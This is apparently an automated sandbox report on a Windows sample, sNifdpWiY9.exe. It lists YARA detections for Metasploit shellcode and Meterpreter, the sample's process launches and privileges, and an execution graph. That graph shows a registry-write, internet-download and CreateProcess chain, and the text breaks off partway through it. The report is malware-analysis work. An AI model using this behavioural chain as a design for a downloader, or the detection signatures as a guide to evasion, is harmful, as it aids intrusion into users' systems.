                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Yara matches:
                          • Rule: Windows_Trojan_Metasploit_38b8ceec, Description: Identifies the API address lookup function used by metasploit. Also used by other tools (like beacon)., Source: 00000009.00000002.2494352245.000001DE4A43D000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                          • Rule: Windows_Trojan_Metasploit_7bc0f998, Description: Identifies the API address lookup function leverage by metasploit shellcode, Source: 00000009.00000002.2494352245.000001DE4A43D000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                          • Rule: Windows_Trojan_Metasploit_c9773203, Description: Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families., Source: 00000009.00000002.2494352245.000001DE4A43D000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                          • Rule: Windows_Trojan_Metasploit_38b8ceec, Description: Identifies the API address lookup function used by metasploit. Also used by other tools (like beacon)., Source: 00000009.00000002.2494768618.000001DE4A640000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                          • Rule: Windows_Trojan_Metasploit_7bc0f998, Description: Identifies the API address lookup function leverage by metasploit shellcode, Source: 00000009.00000002.2494768618.000001DE4A640000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                          • Rule: Windows_Trojan_Metasploit_c9773203, Description: Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families., Source: 00000009.00000002.2494768618.000001DE4A640000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                          • Rule: JoeSecurity_Meterpreter, Description: Yara detected Meterpreter, Source: 00000009.00000002.2494296675.000001DE4A433000.00000002.00001000.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: MALWARE_Win_Meterpreter, Description: Detects Meterpreter payload, Source: 00000009.00000002.2494296675.000001DE4A433000.00000002.00001000.00020000.00000000.sdmp, Author: ditekSHen
                          • Rule: JoeSecurity_Meterpreter, Description: Yara detected Meterpreter, Source: 00000009.00000002.2494041747.000001DE4A3D4000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: Windows_Trojan_Metasploit_38b8ceec, Description: Identifies the API address lookup function used by metasploit. Also used by other tools (like beacon)., Source: 00000009.00000002.2494041747.000001DE4A3D4000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                          • Rule: Windows_Trojan_Metasploit_7bc0f998, Description: Identifies the API address lookup function leverage by metasploit shellcode, Source: 00000009.00000002.2494041747.000001DE4A3D4000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                          • Rule: Windows_Trojan_Metasploit_c9773203, Description: Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families., Source: 00000009.00000002.2494041747.000001DE4A3D4000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                          • Rule: MALWARE_Win_Meterpreter, Description: Detects Meterpreter payload, Source: 00000009.00000002.2494041747.000001DE4A3D4000.00000040.00001000.00020000.00000000.sdmp, Author: ditekSHen
                          Antivirus matches:
                          • Detection: 3%, ReversingLabs
                          Reputation:low
                          Has exited:false

                          Target ID:10
                          Start time:05:41:07
                          Start date:05/12/2024
                          Path:C:\Windows\System32\conhost.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Imagebase:0x7ff75da10000
                          File size:862'208 bytes
                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Reputation:high
                          Has exited:false

                          Target ID:12
                          Start time:05:41:15
                          Start date:05/12/2024
                          Path:C:\Users\user\Desktop\sNifdpWiY9.exe
                          Wow64 process (32bit):false
                          Commandline:"C:\Users\user\Desktop\sNifdpWiY9.exe"
                          Imagebase:0x7ff75f8b0000
                          File size:3'188'321 bytes
                          MD5 hash:897699BDF92B6380FA7ABD4FDA6794CA
                          Has elevated privileges:false
                          Has administrator privileges:false
                          Programmed in:C, C++ or other language
                          Reputation:low
                          Has exited:true

                          Target ID:13
                          Start time:05:41:15
                          Start date:05/12/2024
                          Path:C:\Windows\System32\conhost.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Imagebase:0x7ff75da10000
                          File size:862'208 bytes
                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                          Has elevated privileges:false
                          Has administrator privileges:false
                          Programmed in:C, C++ or other language
                          Reputation:high
                          Has exited:true

                          Target ID:16
                          Start time:05:41:15
                          Start date:05/12/2024
                          Path:C:\Users\user\Desktop\sNifdpWiY9.exe
                          Wow64 process (32bit):false
                          Commandline:"C:\Users\user\Desktop\sNifdpWiY9.exe"
                          Imagebase:0x7ff75f8b0000
                          File size:3'188'321 bytes
                          MD5 hash:897699BDF92B6380FA7ABD4FDA6794CA
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Reputation:low
                          Has exited:true

                          Target ID:17
                          Start time:05:41:15
                          Start date:05/12/2024
                          Path:C:\Windows\System32\conhost.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Imagebase:0x7ff75da10000
                          File size:862'208 bytes
                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Reputation:high
                          Has exited:true

                          Target ID:19
                          Start time:05:41:23
                          Start date:05/12/2024
                          Path:C:\Users\user\Desktop\sNifdpWiY9.exe
                          Wow64 process (32bit):false
                          Commandline:"C:\Users\user\Desktop\sNifdpWiY9.exe"
                          Imagebase:0x7ff75f8b0000
                          File size:3'188'321 bytes
                          MD5 hash:897699BDF92B6380FA7ABD4FDA6794CA
                          Has elevated privileges:false
                          Has administrator privileges:false
                          Programmed in:C, C++ or other language
                          Reputation:low
                          Has exited:true

                          Target ID:20
                          Start time:05:41:23
                          Start date:05/12/2024
                          Path:C:\Windows\System32\conhost.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Imagebase:0x7ff75da10000
                          File size:862'208 bytes
                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                          Has elevated privileges:false
                          Has administrator privileges:false
                          Programmed in:C, C++ or other language
                          Reputation:high
                          Has exited:true

                          Target ID:22
                          Start time:05:41:23
                          Start date:05/12/2024
                          Path:C:\Users\user\Desktop\sNifdpWiY9.exe
                          Wow64 process (32bit):false
                          Commandline:"C:\Users\user\Desktop\sNifdpWiY9.exe"
                          Imagebase:0x7ff75f8b0000
                          File size:3'188'321 bytes
                          MD5 hash:897699BDF92B6380FA7ABD4FDA6794CA
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Reputation:low
                          Has exited:true

                          Target ID:23
                          Start time:05:41:24
                          Start date:05/12/2024
                          Path:C:\Windows\System32\conhost.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Imagebase:0x7ff75da10000
                          File size:862'208 bytes
                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Reputation:high
                          Has exited:true

                          Reset < >

                            Execution Graph

                            Execution Coverage:1.2%
                            Dynamic/Decrypted Code Coverage:0%
                            Signature Coverage:22.7%
                            Total number of Nodes:494
                            Total number of Limit Nodes:54
                            execution_graph 65941 7ff75f8b1c51 65942 7ff75f8b1c56 65941->65942 65986 7ff75f8b164a RegOpenKeyExA 65942->65986 65944 7ff75f8b1cb3 65990 7ff75f994540 65944->65990 65946 7ff75f8b1ded 65947 7ff75f994540 44 API calls 65946->65947 65948 7ff75f8b1e27 65947->65948 65949 7ff75f8b1ea0 65948->65949 65950 7ff75f8b1ed5 65948->65950 65952 7ff75f994540 44 API calls 65949->65952 65997 7ff75f994de0 65950->65997 65984 7ff75f8b1eb9 65952->65984 65953 7ff75f8b1eef 66001 7ff75f950e00 65953->66001 65955 7ff75f8b1f08 66007 7ff75f948c40 65955->66007 65957 7ff75f8b1f23 65958 7ff75f8b1f78 65957->65958 66010 7ff75f944440 65957->66010 65959 7ff75f8d95e0 61 API calls 65958->65959 65961 7ff75f8b1f8b 65959->65961 66030 7ff75f994c80 65961->66030 65965 7ff75f8b1f49 65967 7ff75f8b1f58 SetFileAttributesA 65965->65967 65966 7ff75f8b1fa5 65968 7ff75f8d95e0 61 API calls 65966->65968 65967->65958 65969 7ff75f8b1fc7 65968->65969 65970 7ff75f994c80 strlen 65969->65970 65971 7ff75f8b1fe1 65970->65971 66033 7ff75f8b1703 65971->66033 65973 7ff75f8b2000 65974 7ff75f8b2007 65973->65974 65975 7ff75f8b203c 65973->65975 65976 7ff75f994540 44 API calls 65974->65976 65977 7ff75f8b1703 52 API calls 65975->65977 65976->65984 65978 7ff75f8b204c 65977->65978 65979 7ff75f8b2085 65978->65979 65980 7ff75f8b2053 65978->65980 66059 7ff75f8b1a4c 65979->66059 65982 7ff75f994540 44 API calls 65980->65982 65982->65984 65983 7ff75f8b2095 65983->65984 65985 7ff75f994540 44 API calls 65983->65985 65985->65984 65987 7ff75f8b16a4 65986->65987 65988 7ff75f8b16fb 65986->65988 65989 7ff75f8b16bf RegSetValueExA RegCloseKey 65987->65989 65988->65944 65989->65988 65991 7ff75f994551 strlen 65990->65991 65992 7ff75f994578 65990->65992 66070 7ff75f990b80 65991->66070 66093 7ff75f98de50 40 API calls 65992->66093 65996 7ff75f99458d 65996->65946 65998 7ff75f994e08 65997->65998 66111 7ff75f98f0c0 65998->66111 66000 7ff75f994e5c 66000->65953 66002 7ff75f950e29 66001->66002 66132 7ff75f94d030 66002->66132 66004 7ff75f950e49 66136 7ff75f94d180 66004->66136 66228 7ff75f949000 66007->66228 66009 7ff75f948c58 66009->65957 66011 7ff75f944461 66010->66011 66257 7ff75f8d1ce0 _wmkdir 66011->66257 66013 7ff75f8b1f36 66027 7ff75f8d95e0 66013->66027 66014 7ff75f94447b 66016 7ff75f944483 66014->66016 66262 7ff75f983230 22 API calls 66014->66262 66015 7ff75f8c0a50 2 API calls 66015->66016 66016->66013 66016->66015 66020 7ff75f944524 66016->66020 66018 7ff75f9444b7 66263 7ff75f949c50 61 API calls 66018->66263 66264 7ff75f8bfcf0 RtlCaptureContext RtlUnwindEx abort 66020->66264 66265 7ff75f8d9650 66027->66265 66029 7ff75f8d9614 66029->65965 66280 7ff75f9813c0 strlen 66030->66280 66032 7ff75f994ca4 66032->65966 66034 7ff75f8b170f 66033->66034 66035 7ff75f994540 44 API calls 66034->66035 66036 7ff75f8b1741 66035->66036 66037 7ff75f8b1765 InternetOpenA 66036->66037 66038 7ff75f8b17a2 66037->66038 66039 7ff75f8b17ed 66037->66039 66040 7ff75f994540 44 API calls 66038->66040 66041 7ff75f8b17fc InternetOpenUrlA 66039->66041 66050 7ff75f8b17bb 66040->66050 66042 7ff75f8b1840 66041->66042 66043 7ff75f8b189e 66041->66043 66044 7ff75f994540 44 API calls 66042->66044 66282 7ff75f970870 66043->66282 66044->66050 66046 7ff75f8b18ba 66047 7ff75f8b18d4 66046->66047 66048 7ff75f8b195c InternetReadFile 66046->66048 66049 7ff75f994540 44 API calls 66047->66049 66051 7ff75f8b1941 66048->66051 66058 7ff75f8b18ed 66049->66058 66050->65973 66052 7ff75f8b199b 66051->66052 66296 7ff75f93d6b0 66051->66296 66307 7ff75f9704a0 66052->66307 66056 7ff75f994540 44 API calls 66056->66058 66310 7ff75f970f60 44 API calls 66058->66310 66060 7ff75f994de0 7 API calls 66059->66060 66061 7ff75f8b1a89 66060->66061 66377 7ff75f994cd0 66061->66377 66063 7ff75f8b1aa6 66064 7ff75f994540 44 API calls 66063->66064 66065 7ff75f8b1ace 66064->66065 66066 7ff75f8b1b16 CreateProcessA 66065->66066 66067 7ff75f8b1b70 66066->66067 66069 7ff75f8b1b89 66066->66069 66068 7ff75f994540 44 API calls 66067->66068 66068->66069 66069->65983 66094 7ff75f93d820 66070->66094 66073 7ff75f990d30 fwrite 66076 7ff75f990d56 66073->66076 66082 7ff75f990ca6 66073->66082 66074 7ff75f990bdb 66077 7ff75f990e58 66074->66077 66080 7ff75f990c8f 66074->66080 66084 7ff75f990c04 66074->66084 66075 7ff75f990ceb 66075->65946 66100 7ff75f98de50 40 API calls 66076->66100 66077->66082 66085 7ff75f990e6d 66077->66085 66080->66082 66088 7ff75f990dbc 66080->66088 66101 7ff75f98de50 40 API calls 66080->66101 66082->66075 66099 7ff75f98de50 40 API calls 66082->66099 66105 7ff75f8c0a50 66082->66105 66109 7ff75f98db30 RaiseException RaiseException abort 66082->66109 66084->66080 66098 7ff75f98de50 40 API calls 66084->66098 66103 7ff75f8e1ba0 GetCurrentProcess TerminateProcess memcmp memcmp 66085->66103 66088->66082 66091 7ff75f990ded 66088->66091 66104 7ff75f8e1ba0 GetCurrentProcess TerminateProcess memcmp memcmp 66088->66104 66091->66082 66102 7ff75f98de50 40 API calls 66091->66102 66093->65996 66095 7ff75f93d849 66094->66095 66096 7ff75f93d850 66094->66096 66095->66096 66110 7ff75f93d1f0 40 API calls 66095->66110 66096->66073 66096->66074 66096->66082 66098->66080 66099->66082 66100->66082 66101->66088 66102->66082 66103->66085 66104->66091 66106 7ff75f8c0a6b 66105->66106 66107 7ff75f8c0a80 GetCurrentProcess TerminateProcess 66106->66107 66108 7ff75f8c0a79 66106->66108 66108->66107 66109->66082 66110->66096 66112 7ff75f98f11f 66111->66112 66119 7ff75f9826b0 66112->66119 66114 7ff75f98f143 66123 7ff75f981410 66114->66123 66117 7ff75f981410 6 API calls 66118 7ff75f98f171 66117->66118 66118->66000 66120 7ff75f9826c8 66119->66120 66121 7ff75f982720 memcpy 66120->66121 66122 7ff75f9826d3 66120->66122 66121->66122 66122->66114 66124 7ff75f981430 66123->66124 66125 7ff75f981427 66123->66125 66126 7ff75f982806 66125->66126 66127 7ff75f982830 66125->66127 66128 7ff75f98281c 66126->66128 66130 7ff75f982814 memcpy 66126->66130 66131 7ff75f9829e0 GetCurrentProcess TerminateProcess memcpy memcpy memcpy 66127->66131 66128->66117 66130->66128 66131->66128 66133 7ff75f94d05d 66132->66133 66174 7ff75f94d0a0 66133->66174 66137 7ff75f94d1b6 66136->66137 66144 7ff75f94d2f0 66136->66144 66151 7ff75f94d1c0 66137->66151 66219 7ff75f94ec60 wcslen wcslen 66137->66219 66139 7ff75f94d25c 66141 7ff75f94d26a 66139->66141 66139->66144 66140 7ff75f8c0a50 2 API calls 66143 7ff75f94d75e 66140->66143 66145 7ff75f94d298 66141->66145 66146 7ff75f94d6a3 66141->66146 66227 7ff75f9980c0 20 API calls 66143->66227 66221 7ff75f94eae0 22 API calls 66144->66221 66220 7ff75f94eae0 22 API calls 66145->66220 66226 7ff75f94eae0 22 API calls 66146->66226 66151->66140 66151->66143 66152 7ff75f94d1de 66151->66152 66152->65955 66153 7ff75f94d509 66153->66151 66225 7ff75f94e200 43 API calls 66153->66225 66156 7ff75f94d2c5 66156->66151 66156->66153 66222 7ff75f94eae0 22 API calls 66156->66222 66223 7ff75f94e200 43 API calls 66156->66223 66224 7ff75f984260 GetCurrentProcess TerminateProcess memcpy memcpy 66156->66224 66161 7ff75f94d56b 66161->66151 66164 7ff75f94d655 memcpy 66161->66164 66164->66161 66175 7ff75f94d0c9 66174->66175 66184 7ff75f94ee40 66175->66184 66179 7ff75f94d0f3 66180 7ff75f94d08d 66179->66180 66190 7ff75f952b90 61 API calls 66179->66190 66180->66004 66182 7ff75f94d13f 66191 7ff75f8bfcf0 RtlCaptureContext RtlUnwindEx abort 66182->66191 66192 7ff75f97a210 66184->66192 66187 7ff75f991e70 66208 7ff75f991440 66187->66208 66190->66182 66193 7ff75f97a245 66192->66193 66196 7ff75f97ab00 66193->66196 66199 7ff75f98b1d0 66196->66199 66202 7ff75f97e950 66199->66202 66201 7ff75f94d0d5 66201->66187 66203 7ff75f97e967 66202->66203 66204 7ff75f97e973 66203->66204 66207 7ff75f97e9c0 24 API calls 66203->66207 66204->66201 66206 7ff75f97e996 66206->66201 66207->66206 66211 7ff75f990970 66208->66211 66210 7ff75f9914ae 66210->66179 66212 7ff75f9909ae 66211->66212 66214 7ff75f9909cf 66211->66214 66212->66210 66215 7ff75f990b2a 66214->66215 66217 7ff75f985a90 6 API calls 66214->66217 66215->66212 66218 7ff75f985a90 6 API calls 66215->66218 66217->66214 66218->66212 66219->66139 66220->66156 66221->66156 66222->66156 66223->66156 66224->66156 66225->66161 66226->66156 66229 7ff75f949029 66228->66229 66241 7ff75f9490f0 66229->66241 66231 7ff75f949049 66231->66009 66232 7ff75f94903b 66235 7ff75f94903f 66232->66235 66253 7ff75f983230 22 API calls 66232->66253 66233 7ff75f8c0a50 2 API calls 66233->66235 66235->66231 66235->66233 66238 7ff75f9490e0 66235->66238 66236 7ff75f949073 66254 7ff75f949c50 61 API calls 66236->66254 66255 7ff75f8bfcf0 RtlCaptureContext RtlUnwindEx abort 66238->66255 66245 7ff75f949149 66241->66245 66242 7ff75f949159 _wstat64 66243 7ff75f949238 _errno 66242->66243 66244 7ff75f949171 66242->66244 66243->66244 66247 7ff75f94921c 66244->66247 66248 7ff75f8c0a50 2 API calls 66244->66248 66245->66242 66256 7ff75f8d74f0 50 API calls 66245->66256 66247->66232 66251 7ff75f9493e0 66248->66251 66249 7ff75f949293 66250 7ff75f94d180 43 API calls 66249->66250 66249->66251 66252 7ff75f94935d 66250->66252 66251->66251 66252->66242 66253->66236 66254->66235 66256->66249 66258 7ff75f8d1d20 _errno 66257->66258 66259 7ff75f8d1cfa 66257->66259 66258->66259 66260 7ff75f8d1d40 66258->66260 66259->66014 66261 7ff75f9490f0 52 API calls 66260->66261 66261->66259 66262->66018 66263->66016 66266 7ff75f8d9674 66265->66266 66269 7ff75f94dbf0 66266->66269 66268 7ff75f8d969b 66268->66029 66270 7ff75f94dc27 66269->66270 66276 7ff75f94dc31 66270->66276 66277 7ff75f97a1a0 24 API calls 66270->66277 66272 7ff75f94dc57 66278 7ff75f9921a0 7 API calls 66272->66278 66274 7ff75f94dcd7 66274->66276 66279 7ff75f952b90 61 API calls 66274->66279 66276->66268 66277->66272 66278->66274 66279->66276 66281 7ff75f9813ea 66280->66281 66283 7ff75f97089b 66282->66283 66311 7ff75f98dc80 66283->66311 66285 7ff75f9708d9 66286 7ff75f98dc80 2 API calls 66285->66286 66287 7ff75f970905 66286->66287 66314 7ff75f960a40 66287->66314 66290 7ff75f970927 66320 7ff75f98de50 40 API calls 66290->66320 66291 7ff75f970940 66321 7ff75f98de50 40 API calls 66291->66321 66294 7ff75f97092e 66294->66046 66295 7ff75f97094b 66295->66046 66297 7ff75f93d820 40 API calls 66296->66297 66299 7ff75f93d6e3 66297->66299 66298 7ff75f93d737 66298->66048 66301 7ff75f93d70a 66299->66301 66328 7ff75f98de50 40 API calls 66299->66328 66300 7ff75f8c0a50 2 API calls 66300->66301 66301->66298 66301->66300 66329 7ff75f98de50 40 API calls 66301->66329 66330 7ff75f93d920 40 API calls 66301->66330 66331 7ff75f8bfcf0 RtlCaptureContext RtlUnwindEx abort 66301->66331 66332 7ff75f98db30 RaiseException RaiseException abort 66301->66332 66333 7ff75f960ea0 66307->66333 66322 7ff75f98c5c0 66311->66322 66313 7ff75f98dc91 66313->66285 66318 7ff75f960a6f 66314->66318 66315 7ff75f8c0a50 GetCurrentProcess TerminateProcess 66315->66318 66317 7ff75f960b2d 66317->66290 66317->66291 66318->66314 66318->66315 66318->66317 66319 7ff75f960ea0 43 API calls 66318->66319 66327 7ff75f958dc0 GetCurrentProcess TerminateProcess _wfopen 66318->66327 66319->66318 66320->66294 66321->66295 66323 7ff75f98c5fb 66322->66323 66324 7ff75f98c61c 66323->66324 66325 7ff75f8c0a50 2 API calls 66323->66325 66324->66313 66326 7ff75f98c629 66325->66326 66327->66318 66328->66301 66329->66301 66330->66301 66332->66301 66334 7ff75f960ec6 66333->66334 66338 7ff75f960edb 66334->66338 66351 7ff75f960690 66334->66351 66336 7ff75f8b19aa 66336->66056 66337 7ff75f8c0a50 2 API calls 66337->66338 66338->66336 66338->66337 66339 7ff75f960f97 66338->66339 66370 7ff75f8bfcf0 RtlCaptureContext RtlUnwindEx abort 66339->66370 66360 7ff75f9606c9 66351->66360 66352 7ff75f96070e 66352->66338 66353 7ff75f8c0a50 2 API calls 66363 7ff75f9607e7 66353->66363 66354 7ff75f960987 66376 7ff75f998b90 40 API calls 66354->66376 66355 7ff75f8c0a50 2 API calls 66369 7ff75f9608b7 66355->66369 66356 7ff75f96089f 66356->66369 66371 7ff75f958f90 66356->66371 66358 7ff75f9606fd 66358->66352 66358->66353 66358->66363 66360->66358 66364 7ff75f958f90 2 API calls 66360->66364 66361 7ff75f960998 66362 7ff75f9608d1 66362->66338 66363->66356 66365 7ff75f9608e8 66363->66365 66363->66369 66364->66360 66366 7ff75f958f90 2 API calls 66365->66366 66367 7ff75f96090b 66366->66367 66368 7ff75f958f90 2 API calls 66367->66368 66367->66369 66368->66369 66369->66354 66369->66355 66369->66362 66373 7ff75f958fa5 66371->66373 66372 7ff75f958fc0 _write 66372->66373 66374 7ff75f958fd5 _errno 66372->66374 66373->66372 66375 7ff75f958fdd 66373->66375 66374->66372 66374->66375 66375->66369 66376->66361 66380 7ff75f981440 66377->66380 66379 7ff75f994cf4 66379->66063 66381 7ff75f98145e 66380->66381 66383 7ff75f981467 66380->66383 66384 7ff75f982806 66381->66384 66385 7ff75f982830 66381->66385 66382 7ff75f9814a0 66382->66381 66390 7ff75f98151a 66382->66390 66383->66382 66393 7ff75f998250 21 API calls 66383->66393 66387 7ff75f98281c 66384->66387 66389 7ff75f982814 memcpy 66384->66389 66395 7ff75f9829e0 GetCurrentProcess TerminateProcess memcpy memcpy memcpy 66385->66395 66387->66379 66389->66387 66394 7ff75f980900 7 API calls 66390->66394 66392 7ff75f98154c 66392->66379 66394->66392 66395->66387 66396 7ff75f8cddb4 GetCurrentProcess GetProcessAffinityMask 66397 7ff75f8cde08 66396->66397 66398 7ff75f8cde40 66397->66398 66399 7ff75f8c0a50 2 API calls 66397->66399 66400 7ff75f8cde4d GetCurrentProcess GetProcessAffinityMask 66399->66400 66401 7ff75f8cdedf 66400->66401 66405 7ff75f8cde9b GetCurrentProcess SetProcessAffinityMask 66400->66405 66402 7ff75f8cdeea 66401->66402 66404 7ff75f8c0a50 2 API calls 66401->66404 66407 7ff75f8cdf0b 66404->66407 66405->66401 66406 7ff75f8cdf75 66407->66406 66448 7ff75f8ccee0 66407->66448 66409 7ff75f8cdf47 66455 7ff75f8cc7d0 66409->66455 66412 7ff75f8cdf5c 66414 7ff75f8cdf65 66412->66414 66415 7ff75f8ce038 fprintf 66412->66415 66413 7ff75f8cdf98 66471 7ff75f8cd570 66413->66471 66504 7ff75f8ccaa0 malloc free SetEvent GetCurrentThreadId 66414->66504 66508 7ff75f8ccaa0 malloc free SetEvent GetCurrentThreadId 66415->66508 66418 7ff75f8cdfae TlsGetValue 66421 7ff75f8cdfc6 66418->66421 66422 7ff75f8ce0a8 66418->66422 66419 7ff75f8cdf6d 66505 7ff75f8cd1d0 CloseHandle free free fprintf 66419->66505 66426 7ff75f8cd570 24 API calls 66421->66426 66446 7ff75f8ce08a GetModuleHandleA 66421->66446 66424 7ff75f8cd620 45 API calls 66422->66424 66424->66421 66428 7ff75f8cdfda TlsGetValue 66426->66428 66427 7ff75f8ce060 66509 7ff75f8cd1d0 CloseHandle free free fprintf 66427->66509 66430 7ff75f8ce090 66428->66430 66431 7ff75f8cdfeb 66428->66431 66487 7ff75f8cd620 66430->66487 66434 7ff75f8ce09e 66431->66434 66436 7ff75f8cd570 24 API calls 66431->66436 66434->66446 66437 7ff75f8ce001 TlsGetValue 66436->66437 66440 7ff75f8ce080 66437->66440 66441 7ff75f8ce00e 66437->66441 66438 7ff75f998fe8 66439 7ff75f998fbb GetProcAddress GetProcAddress 66439->66438 66443 7ff75f8cd620 45 API calls 66440->66443 66506 7ff75f8ccaa0 malloc free SetEvent GetCurrentThreadId 66441->66506 66445 7ff75f8ce085 66443->66445 66444 7ff75f8ce025 66507 7ff75f8cd1d0 CloseHandle free free fprintf 66444->66507 66445->66441 66445->66446 66446->66438 66446->66439 66449 7ff75f8ccef9 66448->66449 66450 7ff75f8ccf05 calloc 66449->66450 66451 7ff75f8ccf20 66449->66451 66454 7ff75f8ccf31 66450->66454 66453 7ff75f8ccf50 calloc 66451->66453 66451->66454 66453->66454 66454->66409 66456 7ff75f8cc7e5 66455->66456 66457 7ff75f8cc820 66455->66457 66460 7ff75f8cc7f7 66456->66460 66461 7ff75f8cc847 66456->66461 66462 7ff75f8cc888 GetCurrentThreadId 66456->66462 66467 7ff75f8cc7fe 66456->66467 66510 7ff75f8cc760 malloc free 66457->66510 66459 7ff75f8cc828 66459->66456 66459->66467 66463 7ff75f8cc810 GetCurrentThreadId 66460->66463 66460->66467 66464 7ff75f8cc8b8 CreateEventA 66461->66464 66469 7ff75f8cc84e 66461->66469 66462->66461 66462->66467 66463->66467 66465 7ff75f8cc8d0 66464->66465 66466 7ff75f8cc8e9 GetLastError 66464->66466 66468 7ff75f8cc8de CloseHandle 66465->66468 66465->66469 66466->66467 66467->66412 66467->66413 66468->66469 66469->66460 66469->66467 66511 7ff75f8cc560 7 API calls 66469->66511 66472 7ff75f8cd585 66471->66472 66473 7ff75f8cd610 66471->66473 66474 7ff75f8ccee0 2 API calls 66472->66474 66473->66418 66475 7ff75f8cd594 66474->66475 66476 7ff75f8cc7d0 14 API calls 66475->66476 66477 7ff75f8cd5a3 66476->66477 66478 7ff75f8cd5ad TlsAlloc 66477->66478 66483 7ff75f8cd5c2 66477->66483 66479 7ff75f998f56 abort 66478->66479 66478->66483 66481 7ff75f998f5c abort 66479->66481 66482 7ff75f998f75 GetModuleHandleA 66481->66482 66485 7ff75f998fe8 66482->66485 66486 7ff75f998fbb GetProcAddress GetProcAddress 66482->66486 66512 7ff75f8ccaa0 malloc free SetEvent GetCurrentThreadId 66483->66512 66485->66418 66486->66485 66513 7ff75f8cd300 20 API calls 66487->66513 66489 7ff75f8cd62d 66490 7ff75f8cd71c 66489->66490 66491 7ff75f8cd639 GetCurrentThreadId CreateEventA 66489->66491 66492 7ff75f8cd67a GetCurrentProcess GetCurrentThread GetCurrentProcess DuplicateHandle 66489->66492 66497 7ff75f8cd570 24 API calls 66489->66497 66514 7ff75f8cd140 GetCurrentThreadId OutputDebugStringA abort _vscprintf 66489->66514 66490->66431 66491->66489 66493 7ff75f8cd6de GetThreadPriority TlsSetValue 66492->66493 66494 7ff75f998f5c abort 66492->66494 66493->66490 66493->66494 66496 7ff75f998f75 GetModuleHandleA 66494->66496 66500 7ff75f998fe8 66496->66500 66501 7ff75f998fbb GetProcAddress GetProcAddress 66496->66501 66499 7ff75f8cd739 TlsGetValue 66497->66499 66502 7ff75f8cd750 66499->66502 66503 7ff75f8cd74a 66499->66503 66500->66431 66501->66500 66502->66487 66503->66431 66504->66419 66506->66444 66508->66427 66510->66459 66511->66469 66512->66483 66513->66489 66515 7ff75f997260 66516 7ff75f997274 malloc 66515->66516 66517 7ff75f997281 66516->66517 66518 7ff75f997287 66516->66518 66518->66516 66519 7ff75f997295 66518->66519 66520 7ff75f9972c3 malloc 66519->66520 66521 7ff75f9972e7 66520->66521 66522 7ff75f99731e 66520->66522 66522->66521 66523 7ff75f997340 malloc 66522->66523 66524 7ff75f997359 66523->66524 66525 7ff75f8d1540 66528 7ff75f8d159e 66525->66528 66545 7ff75f8d1622 66525->66545 66526 7ff75f8d15d1 66527 7ff75f8d15de 66526->66527 66544 7ff75f8d1839 66526->66544 66526->66545 66558 7ff75f998b50 abort abort 66526->66558 66531 7ff75f8d15f7 66527->66531 66560 7ff75f8d0f60 abort abort 66527->66560 66528->66526 66528->66545 66556 7ff75f8d0f60 abort abort 66528->66556 66529 7ff75f8c0a50 2 API calls 66532 7ff75f8d1cc1 66529->66532 66554 7ff75f8bf9b0 abort 66531->66554 66535 7ff75f8d16c9 66557 7ff75f8d11c0 abort 66535->66557 66537 7ff75f8d1ad1 66561 7ff75f8d11c0 abort 66537->66561 66539 7ff75f8d1612 66555 7ff75f8bf9b0 abort 66539->66555 66542 7ff75f8d1ae3 66562 7ff75f8d11c0 abort 66542->66562 66544->66527 66544->66531 66544->66545 66548 7ff75f8d1655 66544->66548 66552 7ff75f8d1c85 abort 66544->66552 66559 7ff75f8d1060 GetCurrentProcess TerminateProcess abort abort 66544->66559 66563 7ff75f8d1280 abort 66544->66563 66564 7ff75f8d0ee0 GetCurrentProcess TerminateProcess 66544->66564 66545->66529 66545->66548 66546 7ff75f8d11c0 abort 66547 7ff75f8d16fa 66546->66547 66547->66526 66547->66544 66547->66546 66549 7ff75f8d1280 abort 66547->66549 66549->66547 66552->66544 66554->66539 66555->66545 66556->66535 66557->66547 66559->66544 66560->66537 66561->66542 66562->66531 66563->66544 66564->66544 66565 7ff75f8b11e7 66566 7ff75f8b1374 _initterm 66565->66566 66567 7ff75f8b11fc 66565->66567 66569 7ff75f8b12b2 66566->66569 66578 7ff75f8bece0 66567->66578 66571 7ff75f8b13a7 _amsg_exit 66569->66571 66577 7ff75f8b12fd 66569->66577 66570 7ff75f8b1224 SetUnhandledExceptionFilter 66572 7ff75f8b1247 66570->66572 66573 7ff75f8b13d6 66571->66573 66574 7ff75f8b124c malloc 66572->66574 66575 7ff75f8b1276 66574->66575 66575->66569 66576 7ff75f8b1280 strlen malloc 66575->66576 66576->66575 66580 7ff75f8bed18 66578->66580 66602 7ff75f8bed01 66578->66602 66579 7ff75f8befe0 66581 7ff75f8befe9 66579->66581 66579->66602 